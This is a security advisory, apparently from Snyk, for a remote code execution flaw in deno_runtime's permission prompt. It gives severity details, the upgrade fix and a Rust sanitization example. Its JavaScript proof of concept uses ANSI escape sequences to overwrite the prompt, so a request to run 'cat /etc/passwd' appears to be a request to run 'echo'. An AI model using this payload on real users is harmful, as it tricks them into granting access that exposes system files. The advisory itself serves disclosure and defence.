Remote Code Execution (RCE) Affecting deno_runtime package, versions >=0.9.2 <0.100.0



Snyk CVSS

    Attack Complexity: Low
    User Interaction: Required
    Confidentiality: High
    Integrity: High
    Availability: High

    Threat Intelligence

    Exploit Maturity: Proof of concept
    EPSS: 0.16% (53rd percentile)
NVD
8.8 high

  • Snyk ID SNYK-RUST-DENORUNTIME-3373053
  • published 26 Mar 2023
  • disclosed 24 Mar 2023
  • credit LeoDog896

How to fix?

Upgrade deno_runtime to version 0.100.0 or higher.

Overview

Affected versions of this package are vulnerable to Remote Code Execution (RCE) due to improper ANSI neutralization. Arbitrary program names are accepted without any ANSI filtering, which allows any malicious program to clear the first 2 lines of an op_spawn_child or op_kill prompt and replace them with any desired text.

PoC

const boldANSI = "\u001b[1m" // bold
const unboldANSI = "\u001b[22m" // unbold

const prompt = `┌ ⚠️  ${boldANSI}Deno requests run access to "echo"${unboldANSI}
├ Requested by \`Deno.Command().output()`

const moveANSIUp = "\u001b[1A" // moves the cursor up one line
const clearANSI = "\u001b[2K" // clears the line
const moveANSIStart = "\u001b[1000D" // moves to the start of the line

Deno[Object.getOwnPropertySymbols(Deno)[0]].core.ops.op_spawn_child({
    cmd: "cat",
    args: ["/etc/passwd"],
    clearEnv: false,
    env: [],
    stdin: "null",
    stdout: "inherit",
    stderr: "piped"
}, moveANSIUp + clearANSI + moveANSIStart + prompt)
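
One way to neutralize such input before a prompt is drawn, as an added example that is not Deno's patch or code from this advisory: every control character is rendered as visible text, so the cursor-movement and erase sequences are displayed instead of executed. The function names and the two-line prompt layout are assumptions modelled on the PoC strings.

```rust
// Added example, not Deno's patch: render control characters as visible
// text before untrusted strings reach a permission prompt.

/// Replaces every Unicode control character (C0 incl. ESC, DEL, C1 incl.
/// the 8-bit CSI U+009B) with a printable escape such as `\u{1b}`.
fn neutralize_for_prompt(untrusted: &str) -> String {
    let mut out = String::with_capacity(untrusted.len());
    for c in untrusted.chars() {
        if c.is_control() {
            out.extend(c.escape_unicode());
        } else {
            out.push(c);
        }
    }
    out
}

/// Hypothetical prompt renderer; the two-line layout is an assumption
/// modelled on the strings in the PoC.
fn render_prompt(program: &str, api_name: &str) -> String {
    format!(
        "┌ ⚠️  Deno requests run access to \"{}\"\n├ Requested by `{}`\n",
        neutralize_for_prompt(program),
        neutralize_for_prompt(api_name)
    )
}

/// Constructed sample input: the cursor-up, erase-line and cursor-left
/// sequences from the PoC followed by its forged prompt text.
fn poc_style_api_name() -> String {
    let mut s = String::from("\u{1b}[1A\u{1b}[2K\u{1b}[1000D");
    s.push_str("┌ ⚠️  \u{1b}[1mDeno requests run access to \"echo\"\u{1b}[22m\n");
    s.push_str("├ Requested by `Deno.Command().output()");
    s
}

fn main() {
    // The forged text is printed literally after the genuine first line,
    // so the real request ("cat") stays on screen.
    print!("{}", render_prompt("cat", &poc_style_api_name()));
}
```

Escaping keeps the attempted injection visible to the user; stripping the sequences would also stop the overwrite but would hide that the input was hostile.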